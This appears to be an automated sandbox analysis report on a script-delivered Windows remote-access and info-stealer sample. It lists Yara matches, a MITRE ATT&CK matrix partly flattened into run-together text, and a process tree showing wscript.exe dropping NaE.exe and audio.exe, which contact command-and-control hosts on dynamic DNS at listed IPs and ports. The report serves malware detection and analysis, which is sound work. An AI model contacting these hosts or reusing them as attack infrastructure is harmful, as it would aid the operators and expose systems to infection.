                        Source: Yara matchFile source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 4.2.NaE.exe.35083c0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.wscript.exe.27d83495000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.wscript.exe.27d83f5a630.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.NaE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.wscript.exe.27d83495000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1404488524.0000027D83ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003508000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NaE.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\audio.exe, type: DROPPED

                        Remote Access Functionality

                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 4.2.NaE.exe.35083c0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.wscript.exe.27d83495000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.wscript.exe.27d83f5a630.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.NaE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.wscript.exe.27d83495000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1404488524.0000027D83ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003508000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NaE.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\audio.exe, type: DROPPED
                        Mitre Att&ck Matrix (techniques listed per tactic; the numbers shown before a technique name are kept as they appear in the report)

                        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
                        Resource Development: 311 Scripting; Domains; DNS Server; Virtual Private Server
                        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
                        Execution: 1 Native API; 1 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job
                        Persistence: 311 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job
                        Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; 1 Scheduled Task/Job
                        Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 12 Obfuscated Files or Information
                        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
                        Discovery: 1 System Time Discovery; 2 File and Directory Discovery; 24 System Information Discovery
                        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
                        Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive
                        Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port
                        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
                        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact
                        1
                        Registry Run Keys / Startup Folder
                        1
                        Registry Run Keys / Startup Folder
                        2
                        Software Packing
                        NTDS231
                        Security Software Discovery
                        Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets31
                        Virtualization/Sandbox Evasion
                        SSHKeylogging213
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain Credentials2
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                        Virtualization/Sandbox Evasion
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                        Process Injection
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior Graph ID: 1430766
Sample: Price request N#U00b0DEM230...
Startdate: 24/04/2024
Architecture: WINDOWS
Score: 100

Contacted domains:
• chonglee575.duckdns.org (signature: Uses dynamic DNS services)
• postutopia.net
• chongmei33.publicvm.com

Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 20 other signatures

Process tree:
• wscript.exe (started)
  Network: postutopia.net 51.254.27.105, 443, 49705 OVHFR France
  Dropped: C:\Users\user\AppData\Local\Temp\IDWYPJ.js, ASCII; C:\Users\user\AppData\Local\...\wp[1].js, ASCII
  Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; JScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage)
  • wscript.exe (started)
    Dropped: C:\Users\user\AppData\Local\Temp\NaE.exe, PE32
    Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    • NaE.exe (started)
      Dropped: C:\Users\user\AppData\Local\Temp\audio.exe, PE32
      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      • cmd.exe (started)
        • audio.exe (started)
          Network: chonglee575.duckdns.org 141.101.134.51, 49746, 6974 NETZBETRIEB-GMBHDE Netherlands; chongmei33.publicvm.com 178.73.192.3, 2703, 49746 PORTLANEwwwportlanecomSE Sweden
